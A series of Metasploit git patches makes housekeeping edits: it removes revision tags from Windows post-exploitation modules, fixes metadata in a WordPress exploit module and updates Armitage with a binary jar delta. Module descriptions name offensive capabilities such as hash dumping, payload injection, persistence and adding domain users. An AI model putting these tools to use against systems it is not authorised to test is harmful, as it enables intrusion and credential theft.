[ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index 8cd0ff45dc..d1c272a787 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the OS license key }, 'License' => MSF_LICENSE, 'Author' => [ 'Brandon Perry '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index d4dba2b539..78e0035280 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate Microsoft Powershell settings }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 833fbc30a0..723ffcc569 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Post def initialize super( 'Name' => 'Windows Gather Proxy Setting', - 'Version' => '$Revision$', 'Description' => %q{ This module pulls a user's proxy settings. If neither RHOST or SID are set it pulls the current user, else it will pull the user's settings diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 023867f57d..6ee9f4aede 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Post migrate to a safe process (explorer.exe for example). }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Keith Faber', 'Kx499'] diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index 98393403a9..04522ba2e4 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate configured and recently used file shares}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index 2531c24c8a..adce91bc6d 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate the SNMP service configuration }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', 'Tebo '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 8b8dc28fdb..1e9bdabb73 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index c4c153c3fc..ea9b850b65 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post privileges are available, the script will not continue. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Joshua Abraham '] diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index f3c68cfa12..fb7e1d8f5d 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather Physical Drives and Logical Volumes', 'Description' => %q{This module will list physical drives and logical volumes}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 4ecdea8181..df2c8f769a 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Gather Forensic Imaging', 'Description' => %q{This module will perform byte-for-byte imaging of remote disks and volumes}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index f44821a10d..4e85c89abe 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Post Allows for forensic tools to be executed on the remote disk directly. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 4706791c19..83c2f566eb 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will dump the local user accounts from the SAM database using the registry }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index ad36c817e6..845c7e6451 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter' ] )) diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index 0bee51963f..97772d2e71 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module prints information about a given SID from the perspective of this session }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index c525f2e564..42ab10ca20 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post to an IP. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => [ 'mubix' ] diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 86bb6deb69..7b53d9391f 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post 'kernelsmith ', # record support 'Adrian Kubok' # better record file names ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'] )) diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 85f57dd421..5276d988af 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 4e6156329f..20b11fcee9 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This Module lists current TCP sessions}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 22239b5995..a7e049260a 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate USB Drive history on a target host.}, 'License' => MSF_LICENSE, 'Author' => [ 'nebulus'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index bf402df57f..1734683a22 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post specified Meterpreter session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index a57872204b..3cf05cb50c 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => 'Joshua Abraham ', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 486516523f..2ecb936778 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post compromised host when connecting to the named NETWORK and SUBMASK.}, 'License' => MSF_LICENSE, 'Author' => [ 'todb'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index d5ded5c06d..3b96b4a4be 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Post def initialize super( 'Name' => 'Windows Manage Proxy Setting Cloner', - 'Version' => '$Revision$', 'Description' => %q{ This module copies the proxy settings from the current user to the targeted user SID, supports remote hosts as well if remote registry diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index 03c11de89a..e3095c4dac 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 05ff3978b3..f8883c54f9 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Post Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, 'License' => BSD_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index 726fab8d87..e145a1b2ec 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index ec24e9cf38..9ed36b35d4 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 27db9259ca..02849fcfde 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Post migrate to that newly spawned process.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 7e3888d84a..881c791c67 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Post payload in to the memory of the created module.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index 1887a5d3e5..a41765f305 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{Maps remote disks and logical volumes to a local Network Block Device server. Allows for forensic tools to be executed on the remote disk directly.}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 96383d6c24..40b5e33190 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/persistence.rb b/modules/post/windows/manage/persistence.rb index f566ed060f..12d2805069 100644 --- a/modules/post/windows/manage/persistence.rb +++ b/modules/post/windows/manage/persistence.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Post 'Carlos Perez ', 'Merlyn drforbin Cousins ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'Actions' => [['TEMPLATE'], ['REXE']], 'DefaultAction' => 'TEMPLATE', diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 0ffd0eed80..59bc7cccff 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Post Setting VERBOSE to true will output both the script prior to execution and the results. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => [ diff --git a/modules/post/windows/manage/pxexploit.rb b/modules/post/windows/manage/pxexploit.rb index 1020d93762..599e6679a8 100644 --- a/modules/post/windows/manage/pxexploit.rb +++ b/modules/post/windows/manage/pxexploit.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Post def initialize super( 'Name' => 'Windows Manage PXE Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 858dd43151..32d5b31c52 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Post from the victim's Trusted Root store.}, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index a88e2dd71f..bf26774efd 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index c1654219c6..9a6c749155 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post password and then execute the command. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'] diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index ce00bb5dd5..b40bd5d425 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post and try any other explorer.exe processes it finds}, 'License' => MSF_LICENSE, 'Author' => [ 'thelightcosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index 42eeecb43b..f1975089d2 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index af675e172d..f4e761de39 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module reverse resolves a range or IP to a hostname}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 916ab500f5..5cb83e4b24 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index 1263417e22..870104b64f 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 73fcf6ae72..7037787c18 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index 2c47a7bf78..8ec2c9ff44 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) From f79ca2597646f84d05aaf20b0ca74f2f987d02ba Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 4 Jan 2013 00:35:59 -0600 Subject: [PATCH 151/154] Add a reference that's good for reading --- scripts/resource/mssql_brute.rc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/scripts/resource/mssql_brute.rc b/scripts/resource/mssql_brute.rc index 305b6a9bc6..dc71de41dd 100644 --- a/scripts/resource/mssql_brute.rc +++ b/scripts/resource/mssql_brute.rc @@ -1,5 +1,10 @@ +# +# Reference: +# http://carnal0wnage.attackresearch.com/2013/01/mssql-brute-forcing-with-resource.html +# + hosts = [] begin From b50e040e699cd462b7ba05a342a1f48ffdc27f1f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 4 Jan 2013 01:11:40 -0600 Subject: [PATCH 152/154] Fix e-mail format, and the extra comma --- .../exploits/unix/webapp/wp_advanced_custom_fields_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index 95acc30dfe..6b4776f6e4 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Charlie Eriksen ', + 'Charlie Eriksen ', ], 'License' => MSF_LICENSE, 'References' => @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), - OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']), + OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']) ], self.class) end From a79f2fa8d1f6f482797cd0eca35d78ccbf4b59e6 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Fri, 4 Jan 2013 12:05:09 -0500 Subject: [PATCH 153/154] Armitage Updates and Bug Fixes This is Armitage release 01.04.13. This update fixes several bugs and improves the user experience launching *_login modules from Armitage. This update adds a Windows 8 icon and includes a fix to better work with the Metasploit 1.45 installer's environment. --- data/armitage/armitage.jar | Bin 3197520 -> 3198925 bytes data/armitage/cortana.jar | Bin 3197515 -> 3198920 bytes data/armitage/readme.txt | 2 +- data/armitage/whatsnew.txt | 18 +++++++++ external/source/armitage/readme.txt | 2 +- external/source/armitage/resources/about.html | 4 +- .../source/armitage/resources/windows8.png | Bin 0 -> 5537 bytes .../armitage/scripts-cortana/internal.sl | 8 +++- external/source/armitage/scripts/armitage.sl | 3 ++ external/source/armitage/scripts/attacks.sl | 35 ++++++++++-------- external/source/armitage/scripts/menus.sl | 1 + external/source/armitage/scripts/passhash.sl | 2 + .../source/armitage/scripts/preferences.sl | 13 ++++++- external/source/armitage/scripts/util.sl | 14 +++++++ .../source/armitage/src/cortana/Cortana.java | 7 ---- external/source/armitage/src/ui/ATable.java | 1 + external/source/armitage/whatsnew.txt | 18 +++++++++ 17 files changed, 98 insertions(+), 30 deletions(-) create mode 100644 external/source/armitage/resources/windows8.png diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 5520637f16890197090616841abbab80260f8d00..cc427103aa870d998b5ebd4e1764faab47b84113 100755 GIT binary patch delta 72666 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 